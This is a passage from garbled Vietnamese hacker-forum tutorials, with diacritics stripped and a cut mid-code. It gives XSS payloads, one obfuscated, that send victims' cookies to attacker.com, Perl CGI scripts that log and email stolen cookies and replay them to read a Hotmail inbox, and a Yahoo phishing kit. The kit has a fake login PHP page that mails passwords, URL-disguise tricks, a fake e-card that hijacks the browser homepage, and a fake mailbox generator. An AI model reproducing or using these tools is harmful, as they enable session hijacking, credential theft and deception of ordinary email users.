on Script trn s dn nn nhn n mt trang c cha CGI Script ca k tn cng v ti y n s nh cp Cookies ca nn nhn. N s c dng nh sau: http://attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264 530098C20 100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_tit an_20=5901=1019511286 Hay cc Hacker cng c th anh la nn nhn bng on Code sau: <html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.ht ml?tw=< script>document.location.replace('http://attacker.com/steal.cgi?'+docu m ent.cookie);</script>"

onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/ News/05/02/ clinton.talkshow.reut/index.html';return true" onMouseOut="window.status='';return true"> Check this CNN story out! </a> </body> </html> Tuy nhin nu on Code l thin nh vy s rt kh la nn nhn cng nh c ch lc ca cc dch v ng dng Web. Chnh v vy ln cc Hacker thng m ho chng li theo chun ASCII (American Standar Code Information Interchance): <html> <head> <title>Look at this!</title> </head> <body> <a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.ht ml?tw=< script>var u = String.fromCharCode(0x0068);u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0070);u %2B= String.fromCharCode(0x003A); u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x002F); u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x0074); u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0061); u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B); u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0072); u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x006F);u %2B=

String.fromCharCode(0x006D); u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073); u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0065); u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C); u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063); u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x0069); u %2B= String.fromCharCode(0x003F);u %2B= document.cookie;document.location.replace(u);</script>" onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/ News/05/02/ clinton.talkshow.reut/index.html';return true" onMouseOut="window.status='';return true"> Check this CNN story out! </a> </body> </html> - Khi cc on Script ny c thc hin trn trnh duyt ca ngi dng hay c t ng thc thi trn trong E-mail ca nn nhn. N s t ng Load cc Tag nh IMG, HTML FRAME (img src ="script.js"> hay <iframe = "script.js">. Khi on Code Java Script c thc hin (c th s dng cc ngn ng khc) th n s b trang Web cha Code CGI ca Hacker nh cp. Cookies s c dng nh sau: http://attacker.com/steal.cgi? lubid=01000000F81038F953EB3C41EB340000585500000000 ;%20p _uniqid=8s51F99ZdNn/n27HtA Gi tr Cookies y chnh l: lubid=01000000F81038F953EB3C41EB340000585500000000 ;%20p _uniqid=8s51F99ZdNn/n27HtA

- Cc Hacker thng s dng mt s on Code nh cp Cookies ca nn nhn v s dng gi tr Cookies ngay trn trnh duyt ca mnh. on Code Perl sau s gip cc Hacker thc hin iu : #!/usr/bin/perl # steal.cgi by David Endler dendler@idefense.com # Specific to your system $mailprog = '/usr/sbin/sendmail'; # create a log file of cookies, well also email them too open(COOKIES,>>stolen_cookie_file); # what the victim sees, customize as needed print "Content-type:text/html\n\n"; print <<EndOfHTML; <html><head><title>Cookie Stealing</title></head> <body> Your Cookie has been stolen. Thank you. </body></html> EndOfHTML # The QUERY_STRING environment variable should be filled with # the cookie text after steal.cgi: # http://www.attacker.com/steal.cgi?XXXXX print COOKIES $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; # now email the alert as well so we can start to hijack open(MAIL,"|$mailprog -t"); print MAIL "To: attacker\@attacker.com\n"; print MAIL "From: cookie_steal\@attacker.com\n"; print MAIL "Subject: Stolen Cookie Submission\n\n"; print MAIL "-" x 75 . "\n\n"; print MAIL $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; close (MAIL); Hacker ch cn c Mail v ly gi tr Cookies va n cp c ca nn nhn v ng nhp vo h thng ng dng Web vi gi tr Cookies m khng cn User v Pass. Tt nhin anh ta c ton quyn s dng ti khon ny. Now Let's Automated it

Mt trong nhng tr ngi ln nht trong qu trnh nh cp Cookies ca cc Hacker c l l s tnh ton v yu t thi gian. Bi v ngoi vic phi phc kch ng thi im nn nhn ng nhp. Cc Hacker cn phi lin tc theo di cc E-mail v nhng CGI log trong khi thc hin cng vic nh cp Cookies, v tin hnh nh cp phin lm vic trc khi nn nhn thot ra khi phin lm vic . Chnh v vy m cc Hacker ngh n lm sao phi t ng ho ci qu trnh tn km cng sc v thi gian ny. Chng ta hy cng xem xt qua Hotmail. Mt dch v Freemail ni ting ca hng MSN. u tin k tn cng cng nh la nn nhn Click vo mt lin kt nh cp Cookies ca h, hoc thm ch cc Hacker cn s dng c cc Worm. Ly v d mt on Cookies ca Hotmail c dng sau: HMP1=1; HMSC0899=223victim%40hotmail%2ecomSxAIWq5iIf2ZTc6e TZYkHUqtZeCuYMKoBAB1eiapyad Kb1RCjuNz5U4%21l1KIOsuBpTEbUKYkmTuzPJVj%2abtLeMyiV Gap9BF82YvrP2WPsX4Z6ekH9a7c Rqq2VqTspQIS33GWygbPEsLOEFIupoiaYZdqmURMJK%21nh6O4 u4UNAJUjzOmQ8ye%2at3GjQfi6p Ba3vTT533tCRmZDy47NZY6cPdkbeHR5soAVnNPyqhvm73a%214 %2aFRHPJfOGhT6cbVR9zN%21XDX 3seXv9czjX6cm2lugTnpKZS2UQ0j%21%21PWkyiqS2aSw%2aKk 2%2aCquxzpjE2F0uVZgHfznNjVL PgGV2H%2a5GqZjXf144U0m8HFwlGS9A8RIwNMGtMoSro%2atCU 6L6304VyZyJ4vlEM%21adk%24; MC1=V=3&GUID=0724b14826c9437ct786ba6f2a36b04f; lang=en-us; mh=MSFT; SITESERVER=ID=UID=0724b14876c9437ca786ba6f2a36b44f ;

MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSdtiJExWGRQ5cmSuJ 9 CUf4QSJbsQNmKkOCe3RLo%21A5G hxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24; MSPProf=2JqD6vvUbB11hog4j6OgbT%21BYwgn3IZN9AyKYUpD NECCi%2a9dBZf37wqxmWtyS%21% 21Z6icYG8dVF30FnbsANQcdN1lQ%21QJCTDiddJAW9oiWSf%2a 8g9nwIGclDtNP6Hk2gFlOfZHEju vkM6Ja1N549eYs1VuhdcHCFWukzbVR%21%218POKn%2aS8vcqV g4ZHHgabh0CQXoxj; domain=lw4fd.law4.hotmail.msn.com; V n s c gi n Script CGI ca Hacker vi ni dung sau: http://attacker.com/steal2.cgi?HMP1=1;%20HMSC0899=223victim% 40hotmail%2ecomSx AIWq5iIf2ZTc6eTZYkHUqtZeCuYMKoBAB1eiapyadKb1RCjuNz 5U4%21l1KIOsuBpTEbUKYkmTuzP JVj%2abtLeMyiVGap9BF82YvrP2WPsX4Z6ekH9a7cRqq2VqTsp QIS33GWygbPEsLOEFIupoiaYZdq mURMJK%21nh6O4u4UNAJUjzOmQ8ye%2at3GjQfi6pBa3vTT533 tCRmZDy47NZY6cPdkbeHR5soAVn NPyqhvm73a%214%2aFRHPJfOGhT6cbVR9zN%21XDX3seXv9czj X6cm2lugTnpKZS2UQ0j%21%21PW kyiqS2aSw%2aKk2%2aCquxzpjE2F0uVZgHfznNjVLPgGV2H%2a 5GqZjXf144U0m8HFwlGS9A8RIwN MGtMoSro%2atCU6L6304VyZyJ4vlEM%21adk%24;%20MC1=V=3 &GUID=0724b14826c9437ct786b a6f2a36b04f;%20lang=en_s;%20mh=MSFT;%20SITESERVER= ID=UID=0724b14876c9437ca786 ba6f2a36b44f;%20MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSd tiJExWGRQ5cmSuJ9CUf4QSJbsQN mKkOCe3RLo%21A5GhxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24;%20 M SPProf=2JqD6vvUbB11hog4j6Og bT%21BYwgn3IZN9AyKYUpDNECCi%2a9dBZf37wqxmWtyS%21%1 Z6icYG8dVF30FnbsANQcdN1lQ% 21QJCTDiddJAW9oiWSf%2a8g9nwIGclDtNP6Hk2gFlOfZHEjuv kM6Ja1N549eYs1VuhdcHCFWukzb

VR%21%218POKn%2aS8vcqVg4ZHHgabh0CQXoxj;%20domain=l w4fd.law4.hotmail.msn.com;

Di y l on Code CGI c s dng nh cp CGI ca Hotmail: #!/usr/bin/perl # steal2.cgi by David Endler dendler@idefense.com use LWP::UserAgent; use HTTP::Cookies; $cookie = HTTP::Cookies->new ( File => $cookiefile, AutoSave => 0, ); # Specific to your system $mailprog = '/usr/sbin/sendmail'; # create a log file of cookies, well also email them too open(COOKIES,>>stolen_cookie_file); # what the victim sees, customize as needed print "Content-type:text/html\n\n"; print <<EndOfHTML; <html><head><title>Cookie Stealing</title></head> <body> Your Cookie has been stolen. Thank you. </body></html> EndOfHTML # The QUERY_STRING environment variable should be # filled with # the cookie text after steal2.cgi: # http://www.attacker.com/steal2.cgi?XXXXX print COOKIES $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; # now email the alert as well so we can start to hijack open(MAIL,"|$mailprog -t"); print MAIL "To: attacker\@attacker.com\n"; print MAIL "From: cookie_steal\@attacker.com\n"; print MAIL "Subject: Stolen Cookie Submission\n\n"; print MAIL "-" x 75 . "\n\n";

print MAIL $ENV{'QUERY_STRING'} from $ENV{REMOTE_ADDR}\n; close (MAIL); # this snippet goes to the victims Hotmail inbox and dumps # the output. An attacker could just as easily add some lines # to parse for http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg? # and then read the individual emails $base_url = http://lw4fd.law4.hotmail.msn.com/cgi-bin/HoTMaiL?; $ua->agent("Mozilla/4.75 [en] (Windows NT 5.0; U)"); $request = new HTTP::Request ('GET', $base_url); $ua->cookie_jar( $cookie ); # lets do a little parsing of our input to separate multiple # cookies # cookies are seperated by a semicolon and # a space (%20), # this will extract them so we can load them into our # HTTP agent @cookies = split(/;%20/,$ENV{'HTTP_COOKIE'}); for (@cookies){ @cookie_pairs = split(/=/, $_); $cookie->set_cookie(0, $cookie_pairs[0] => $cookie_pairs[1], "/", ".hotmail.com"); $cookie->add_cookie_header($request); } # now that our forged credentials are loaded, lets # access the victims Hotmail account! At this point # we can do anything to their account simply by forming the # correct URL $response = $ua->simple_request( $request ); $contents = $response->content; print COOKIES $contents\n; Nh ni trn thc hin mt cuc tn cng XSS khng phi l d. Nhng bn cng ln thn trng trc cc cuc tn cng kiu ny... Bi vit ca Binhnx2000

############################################################# ########## Author by : CUCCU ( Members of HVA ) Website : http:// www.vnhacker.org/forum/ Edit by : PTV5 Group Website : http://www.ptv5online.com ; http://www.ptv5online.net ############################################################# ########## Li m u: Trc tin xin ni trc l bi vit ny l ca ti t nghin cu v vit, bt c bi vit no post li m khng ghi tn ti l tui "ca ci lng" cho tt lun y Th hai l xin php cc bc admin v mod cho bi ny tn ti, ng cho vo st nh ******************************* Bi vit ca ti c 4 bc: ******************************* Bc 1. To Fake login: Mun ly c pass ca victim vi t l thnh cng cao, bn phi c mt trang Web dm y ht nh ca Yahoo! Mail Thung ca ngi khc: QUOTE To tp yahoo.PHP, on code nh sau: <? $contactemail = "mailcuaban@yahoo.com"; // $subject = "password of $login@yahoo.com : $passwd"; $message = ""; mail($contactemail, $subject, $message); header("location: http://login.yahoo.com/config/login?6rfn98...&.src=ym&.last =

&promo=&.intltype=us&.bypass=&.partner=&.u=6l335nstlpk 8v&.v=0&hasMsgr= 0&.chkP=Y&.done=&login=$login&passwd=$passwd&.persist ent="); ?> Save as trang chnh ca yahoo! mail, sau m tp ny bng Notepate v tm n dng: <FORM name=login_form onsubmit="return hash(this,'http://login.yahoo.com/config/login')" action=http://login.yahoo.com/config/login method=post autocomplete="off"> Thay on ny bng : <FORM action="http://trang Web c h tr php/tn ng k ca bn/yahoo.php" method="post"> Ci ny th cc nhiu hng dn trn din n ri, nhng c mt s li sau khin hiu qu khng c cao: 1: on code sa i <form> hot ng tt, nhng gy li trn trang Fake login, ti khng hiu sao my ch trn forum qung co rt nhiu v trang Fake login ca mnh m khng chu sa n i...... Nu bn , lm theo hng dn ca bt k bi vit no hin c trn din n, trang fake login cng hin ln 1 biu tng bo li (c du ! mu vng) Status bar, nu victim tinh 1 t l nhn ra ngay, khng cn nhn ln ng link lm g c Cch sa: Thc ra cng chng c g ng ni, cc ch tit kim qu nn b qua my khai bo n gin: Ch cn sa nh sau:

<FORM name=login_form action="http://trang Web c h tr php/tn ng k ca bn/yahoo.php" method="post" autocomplete="off"> n ri phi khng, thnh cng 1 bc nh trong vic che mt victim........ 2. Nhn ci ng link ca my ch thy chn c ngi, ai li giao din ca Yahoo! Mail m tn ng dn li cc chui c...... No problem, thc t th chng ai ng k c 1 ci domain ging ging nh mail.yahoo.com c...... Cch khc phc y: Ci ny thung ca ngi khc: QUOTE Nu trc ng link, ta thm "@", ri onh lia la cc k t v vn, th IE cng ch cng nhn cc k t ng sau "@" m thi 1 tng hay, do , bn c th thm www.mail.yahoo@ vo ng trc ng link ca bn, VD: http://www.mail.yahoo@trang Web c h tr php/tn ng k ca bn hehhe, thng l victim ch nhn my ci ch u ca ng link m thi, do nhn nh vy cng tm n phi khng..... nu ch no d tnh th uh, nhng ti th khng, lm l phi la khng c 100% th cng phi 95-96% ch, nhn ci tn trang Web ca bn n vn l l ng sau kia ka, ai m chng nhn ra..... Do , c 1 cch cc hay sau: M ho Url: Dng ci ny c th m ho ng link ca bn thnh cc k t long ngong, kh ai dch c (nhng IE li chp nhn). iu s khin victim khng phng

ni do ng link trng hu nh hao hao vi trang Yahoo! Mail khi ta Sign Out Gii thiu qua: Forum http://www.vnhacker.org/forum khi c m ho s nh sau: http://www.vn%68%61cke%72%2E%6Frg/f%6Fru%6D Trng long ngong hp l cha??? Bn th copy ng link trn cho chy th xem sao???m bo dn n forum..... hehheh V sau y l bng hng dn m ho: a ---> %61 b ---> %62 c ---> %63 d ---> %64 e ---> %65 A ---> %41 B ---> %42 C ---> %43 D ---> %44 E ---> %45 f ---> %66 g ---> %67 h ---> %68 i ---> %69 j ---> %6A F ---> %46 G ---> %47 H ---> %48 I ---> %49 J ---> %4A k ---> %6B l ---> %6C m ---> %6D n ---> %6E o ---> %6F K ---> %4B L ---> %4C M ---> %4D N ---> %4E O ---> %4F p ---> %70 q ---> %71 r ---> %72 s ---> %73 t ---> %74 P ---> %50 Q ---> %51 R ---> %52 S ---> %53 T ---> %54 u ---> %75 v ---> %76 w ---> %77 x ---> %78 y ---> %79 U ---> %55 V ---> %56 W ---> %57 X ---> %58 Y ---> %59 z ---> %7A Z ---> %5A 1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35 6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30

. ---> %2E Okie, c ri , lu nh sau: ng link no d long ngong n u th cng vn c cc ch v con s, do bn khng nn m ho tt c, m ch m ho 1 s t nhy cm, v d www11.brinkster.com chng hn, victim khng nhn ra l brinkster, bn m ho mt s t thi: w%77w1%31.br%69ks%74er%2Ecom hehhe, hp l ch....... Thnh cng nhe..... ************************************************ ********** Bi vit ca Cuccu__ ************************************************ ********** Bc 1 ti gii thiu trn mi ngi u c th lm c, khng c g mi c, ti ch hng dn cc bn cch m ho v sa li ca trang fake login cho hon ho hn m thi, nu cc bn kho dng, c th la c kh nhiu ngi, c th ni l k c nhng ngi kha kh v fake login cng b la nh chi, nu khng cnh gic cao ...... Nhng chnh xc ca con mi khng c cao, chng nh li r victim vo ca hng no hay l shere cho victim ci trang ny???? Khng hp l..... Bc 2 di y cho php bn Vit Nam, thay i homepage address tn bn M.... hehhe, sng khng Theo iu tra ca ti, th khong 100 my tnh c nhn c ni mng th khong 60% l c set homepage vo cc trang hay dng, in hnh nh mail.yahoo.com, hotmail.com, vnexpress.net..... nh vy, cho d bn c set homepage ln vo my victim, cng khng h b pht hin.

Hin nay c con virus Html/Sam.A cng c chc nng tng t, nhng b cng b m ngun v hu ht cc chng trnh dit virus dit c......Nn ti dng cch khc..... T cc bc sau, yu cu cc bn phi nm c tng i cch lp trnh Web, n gin thi, ch l cc JavaScript v Html , khng c g phc tp c, vi mc ngy cng kh (hic, u t t cht xm mi thnh cng c, phi khng nh ********************************************** Bc 2: Mn gi b mng, hay gi l nm giu tay cng c Gii thch tng: Ti ngm cu thnh cng 1 dng fake greeting ecard, dng frame kt hp vi JavaScript nh la victim (hic ni ra th ti cn la c ai na !!!!), ecard do bn to ra cng p, th mc la ca victim cng cao..... Khi victim ngh y l 1 ecard tht, tt nhin s click vo 1 nt no , v d nh nt c tn l Begin chng hn, khi click vo , th s c 1 bng thng bo ca Homepage, ci ny l khuyt im duy nht ca bc ny, nhng ti tin l khng ai nghi ng c, v hu nh trang eCard xn no cng c nhng thng bo v PopUp, thnh ra thng bo s khng ai . Khi victim click vo Okie, th eCard s m ra v ten tn ten, my ca victim b set homepage address l trang fake login ca mnh ri....... Nu bn l ngi thch su tm pass, th y l 1 cch l tng, cn nu khng, th thch hp cho victim c ni mng nh...... Phn 3 ti s hng dn cc bn cch nh thng mc tiu, nhm victim no l khng th chy c....., cch ny ni chung l i vi nhng ai rnh lp trnh Web th tng i n gin, cn Newbie th s rt kh khn y...... ********************************************* 1) Lm trang fake ecard

V d: http://w%77w%2Emir%63%64.us/%70%79mn%71h/@6% 2Eh%74m (click vo OK xem kt qu, yn tm khng thnh victim u) Sau y l hng dn: Thc cht ca vn l on script set homepage, on script nh sau: QUOTE <A title="Tiu ca bn" href="ng dn n trang ecard dm ca bn" target=_self onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('ng dn n trang fake login ca bn');">tn nt</a> Lu l ng dn n trang fake login phi c 2 du ', nu khng n khng hot ng u on Script ny c tc dng to 1 nt, va m ra 1 trang mi, va set homepage address, thnh ra hiu qu cc cao...... Cn lm giao din trang eCard nh th no l tu thuc vo bn 2. To th c giao din nh 1 ecard mail Sau , bn lp 1 hm th mi, c tn g nghe lin quan n eCard 1 t, to 1 th c giao din nh 1 ecard (rt n gin, bn ch cn copy/paste 1 ci Greeting card bt k, sau dn vo Msg box ca bn, chnh sa ng dn n ecard ca bn l xong (nh m ho ng dn nh ), khi victim click vo..... hhhhe, cc bn cng on c kt qu ri

....) Chc thnh cng! **************************************** Bi vit ca Cuccu__ **************************************** Ch : Nu cc bn dng host www.mircd.com, v dng cch m ho Url, cn ch : * M ho Url thng thng chp nhn tt c cc trang Web, nhng nu bn Save as trang login ca Yahoo, th n s khng c cc file nh, lc fake login ca bn s thng l ch nu up ln host m ng link ca bn c m ho (th m xem) Cch khc phc: sa ng dn ca cc file nh Khi bn save as, thng l n s save thnh file: Yahoo! Mail - the best.......htm v 1 th mc cha cc file nh v *.js c tn l Yahoo! Mail - the best......_files. Chnh ci tn long ngong ny khin cho cc file nh nm trong n load rt chm v nhiu khi khng load c, gy ra hin tng li....., nu bn dng www.mircd.com th n ch cho upload file, khng cho to th mc mi.... u tin, bn nn sa ci file Yahoo! Mail..... thnh tn ngn gn thi, cng ngn cng tt (nu bn dng www.mircd.com th nn i thnh index.html) Dng trnh notepad, m file ra, n t hp phm : ctrl + H ( thay th 1 cm t thnh 1 cm t khc) box Find What: in vo l Yahoo! Mail - The best free web-based email!_files/

 box Replace With: trng Sau bn click vo Replace All thay th Save file index.html va sa i li, copy tt c cc file trong th mc Yahoo! Mail - The best free web-based email!_files v file index.html vo cng 1 th mc khc, sau upload ln host..... Okie, lc ny th bn m ho Url thoi mi ri ...... Bc 3: Nghi binh Theo ti, nu ch c trang fake login th cha gt victim, nht l khi cn nh trng i tng cn ly pass (nh pass ca ngi yu chng hn ), do cn mt vi th thut nho nh victim khng nghi ng....... 1) Gi mo Mail Box ca Victim: Mt Mail Box c m ra m qun khng Sign Out, thng khi truy cp li, Yahoo! Mail s t ng login li Mail Box va m, do , cch nghi binh u tin l to mt mail box y ht ca victim, trong tt c cc nt, ng link b thay i n cc trang gi mo ca mnh. Cc "cng c" cn c trc tin: * Bn vo MailBox ca chnh bn, save as n, sau khng cn lm g na, bn ch cn cc file trong th mc "Yahoo! Mail - Tn bn@yahoo.com_files" * trang Re_login ca Yahoo! Mail (c khi ta m 2 Mail Box khc nhau) * trang Return Yahoo! Mail (c c khi ta Sign Out) * Sau khi c c 2 trang ny, sa ng dn Re_login v Return Yahoo! Mail n trang Fake login ca bn * c ch ca ti trn v lm theo nh vy i vi 2 trang va save as (Re_login v Return Yahoo! Mail)

Do cch lm trang Fake Mailbox c l kh i vi nhng ngi mi v nhng ai khng quen lp trnh Web, ti vit 1 Tool c chc nng gi mo Mail Box ca Victim, bn ch cn in cc thng s vo l xong.... (ph, mt qu , khng bit xong v ny c ln * ko ) Bn copy ton b on code di y vo 1 trang web, save li l dng c ngay sau khi save, bn copy trang fake mailbox ny vo cng 1 th mc vi nhng file trong th mc "Yahoo! Mail - Tn bn@yahoo.com_files" va save as xong........ Lu : Xin gi li tn tc gi h, nu bn mun truyn b rng ri, Thanks Sau y l on code, do qu di nn ti post lm 2 phn, bn copy 2 bi lm 1 nh: (ti hng dn rt k ri, bn ch cn lm theo l c) <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>Chinh* su*a Mail Box Victim</TITLE> <META http-equiv=Content-Type content="text/html; charset=windows-1252"><LINK <META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD> <BODY bgcolor="#FFFFCC"> <p align="center"> <u> <font size="7" color="#FF9900"><b>Chinh sua Mail Box gia mao. cua Victim</b></font></u></p> <p align="right"><b><i><u><font size="4" color="#FF0000">(Nguoi viet: Cuccu__)</font></u></i><BR> </b><BR> </p> <p align="left"> <b>Dia chi Mail cua victim:</b> <INPUT value="victim"

name=b1 size="25"> (khong co' duoi @yahoo.com)<BR><BR> <b>Duong link cua trang Re_login dom* cua ban: </b> <INPUT value="Yahoo! Mail relogin" name=b2 size="20"> (nho'' phai co' http://)<br> <font color="#FF0000">(co' tac dung khi click vao` bat ki` nut check mail, compose, inbox.....)<br> </font><br> <b>Duong link cua trang Return Yahoo! Mail: </b> <INPUT value="Yahoo!" name=b3 size="20"> (nho'' phai co' http://)<br> <font color="#FF0000">(co' tac dung khi click vao` nut Sign Out)</font><BR><BR> <b>So^' mail trong folder Inbox</b>: <INPUT value="2" name=b4 size="20"><BR><BR> <b>So^' mail trong folder Bulk</b>: <INPUT value=29 name=b5 size="20"><BR><BR> <b>Tong^* cua mail trong Inbox va` Bulk</b>: <INPUT value=31 name=b6 size="20"><BR><BR> <b>Ten^ dau^` cua Victim:</b> <INPUT value=Phan name=b7 size="20"><br> <font color="#FF0000">(trong dong` Wellcome...., vi' du. hop thu cua toi la` Wellcom, Phan)</font></p> <script> function gene() { r=Math.floor(Math.random()*100000) K='"' F="S" clrar.value+="<!DOCTYPE HTML PUBLIC "+K+"-//W3C//DTD HTML 4.0 Transitional//EN"+K+">\n" clrar.value+="<!-- saved from url=(0058)http://us.f137.mail.yahoo.com/ym/login?.rand=8 4b8k66avhn5g -->\n" clrar.value+="<!--web13705--

><HTML><HEAD><TITLE>Yahoo! Mail "+b1.value+"@yahoo.com</TITLE>\n" clrar.value+="<META http-equiv=Content-Type content="+K+"text/html; charset=windows-1252"+K+">\n" clrar.value+="<script>\n" clrar.value+="<!-- \n" clrar.value+="if (typeof top.frames["+K+"wmailmain"+K+"] != "+K+"undefined"+K+") {\n" clrar.value+=" window.open("+K+"http://mail.yahoo.com"+K+", "+K+"_top"+K+");\n" clrar.value+="}\n" clrar.value+="var ypim_color = "+K+"blue"+K+";\n" clrar.value+="// -->\n" clrar.value+="</"+F+"CRIPT>\n\n" clrar.value+="<script src="+K+"ylib_dom.js"+K+"></"+F+"CRIPT>\n\n" clrar.value+="<script language=JavaScript \n" clrar.value+="src="+K+"pim.js"+K+"></"+F+"CRIPT>\n\n " clrar.value+="<script language=JavaScript\n" clrar.value+="src="+K+"pim_css.js"+K+"></"+F+"CRIPT> \n" clrar.value+="<NOSCRIPT>\n" clrar.value+="<META http-equiv=Refresh content="+K+"0; URL=/ym/login?nojs=1"+K+"></NOSCRIPT>\n" clrar.value+="<script>\n" clrar.value+=" var newWin=null;\n" clrar.value+=" var onscreen=false;\n\n" clrar.value+=" function NewWin(url,name,xpos,ypos,width,height)\n" clrar.value+=" {\n" clrar.value+=" newWin=window.open(\n" clrar.value+=" url,\n"

clrar.value+=" name,\n" clrar.value+=" "+K+"screenX="+K+"+xpos+"+K+",screenY="+K+"+ypos+ "+K+",WIDTH="+K+"+width+"+K+",HEIGHT="+K+"+heigh t+"+K+",location=0,resizable=1,status=0,titlebar=1,directo ries=0,toolbar=0,menubar=0,scrollbars=0,status=0"+K+"\n " clrar.value+=" );\n" clrar.value+=" newWin.focus();\n" clrar.value+=" onscreen=true; \n" clrar.value+=" }\n" clrar.value+="</"+F+"CRIPT>\n" clrar.value+="<TD></TD><TD></TD>\n" clrar.value+="<META content="+K+"Microsoft FrontPage 5.0"+K+" name=GENERATOR></HEAD>\n" clrar.value+="<BODY vLink=#0000ff link=#0000ff bgColor=white leftMargin=4 topMargin=4 \n" clrar.value+="marginheight="+K+"4"+K+" marginwidth="+K+"4"+K+">\n" clrar.value+="<script>\n" clrar.value+=" function Help(link)\n" clrar.value+=" {\n" clrar.value+=" window.open(link,"+K+"help"+K+","+K+"width=400,height =500,scrollbars=yes,dependent=yes"+K+");\n" clrar.value+=" }\n" clrar.value+=" if (document.cookie != "+K+""+K+" && document.cookie.indexOf("+K+"19AC/A"+K+") == -1) {\n" clrar.value+=" window.open("+K+"http://mail.yahoo.com"+K+", "+K+"_top"+K+");\n" clrar.value+=" }\n" clrar.value+="</"+F+"CRIPT>\n" clrar.value+="<!-- begin search masthead -->\n" clrar.value+="<DIV style="+K+"MARGIN-TOP: 4px"+K+">\n" clrar.value+="<TABLE cellSpacing=0 cellPadding=0 width="+K+"100%"+K+" border=0>\n"

clrar.value+=" <TBODY>\n" clrar.value+=" <TR bgColor=#dcdcdc>\n" clrar.value+=" <TD noWrap colSpan=2 height=4><SPACER height="+K+"1"+K+" width="+K+"1"+K+" \n" clrar.value+=" type="+K+"block"+K+"></TD></TR>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD width="+K+"99%"+K+">\n" clrar.value+=" <TABLE cellSpacing=0 cellPadding=0 border=0>\n" clrar.value+=" <TBODY>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD noWrap colSpan=3 height=3><SPACER height="+K+"1"+K+" width="+K+"1"+K+" \n" clrar.value+=" type="+K+"block"+K+"></TD></TR>\n" clrar.value+=" <TR>\n" clrar.value+=" <TD><A href="+K+"http://mail.yahoo.com/"+K+"><IMG height=34 \n" clrar.value+=" alt="+K+"Yahoo! Mail"+K+" \n" clrar.value+=" src="+K+"mailma1.gif"+K+" \n" clrar.value+=" width=250 border=0></A> </TD>\n" clrar.value+=" <TD noWrap><FONT face=arial size=-1><A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/pimnav/welcom e/?http://www.yahoo.com"+K+">Yahoo!</A> \n" clrar.value+=" - <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/pimnav/welcom e/?http://my.yahoo.com"+K+">My \n" clrar.value+=" Yahoo!</A> - <A \n" clrar.value+=" href="+K+"http://us.rd.yahoo.com/mail_us/help/?http://hel p.yahoo.com/help/us/mail"+K+">Help</A> \n" clrar.value+=" </FONT> </TD>\n" clrar.value+=" <TD align=right>\n" clrar.value+=" <script language=JavaScript>\n" clrar.value+="var pb_target="+K+"_blank"+K+";\n"

clrar.value+="var pb_URL = new Array();\n" clrar.value+="pb_URL[1]="+K+"http://rd.yahoo.com/M=24 3098.2891634.4238018.1284474/D=mail/S=150500014:PB /A=1579788/R=0/id=flashurl/SIG=18a42jaeu/*http://shop. store.yahoo.com/cgibin/clink?hp3+shopping:dmad/M=243098.2891634.423801 8.1284474/D=mail/S=150500014:PB/A=1579788/R=1/105 7492859+http://us.rmi.yahoo.com/rmi/http://www.compaq. com/rmi-framedurl/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+";\n" clrar.value+="var pb_flashfile="+K+"http://us.a1.yimg.com/us.yimg.com/a/1/flash/hp/pb/pbhp_84x28_blu_yahoomail.swf"+K+";\n" clrar.value+="var pb_altURL="+K+"http://rd.yahoo.com/M=243098.2891634. 4238018.1284474/D=mail/S=150500014:PB/A=1579788/R =2/id=altimgurl/SIG=18a6fp7oj/*http://shop.store.yahoo.c om/cgibin/clink?hp3+shopping:dmad/M=243098.2891634.423801 8.1284474/D=mail/S=150500014:PB/A=1579788/R=3/105 7492859+http://us.rmi.yahoo.com/rmi/http://www.compaq. com/rmi-framedurl/http://www.compaq.com/bridge/poweredby/smb/indexyahoo.html"+K+";\n" clrar.value+="var pb_altimg="+K+"http://us.a1.yimg.com/us.yimg.com/a/1/flash/hp/pb/pbhp_84x28_blu_yahoo.gif"+K+";\n" clrar.value+="var pb_width=84;\n" clrar.value+="var pb_height=28;\n" clrar.value+="var pb_FitNewWinHeight = new Array;\n" clrar.value+="var pb_FitNewWinWidth = new Array;\n" clrar.value+="pb_FitNewWinWidth[1] = 790;\n" clrar.value+="pb_FitNewWinHeight[1] = 590;\n" clrar.value+=" </"+F+"CRIPT>\n\n" clrar.value+=" <script language=JavaScript \n" clrar.value+="

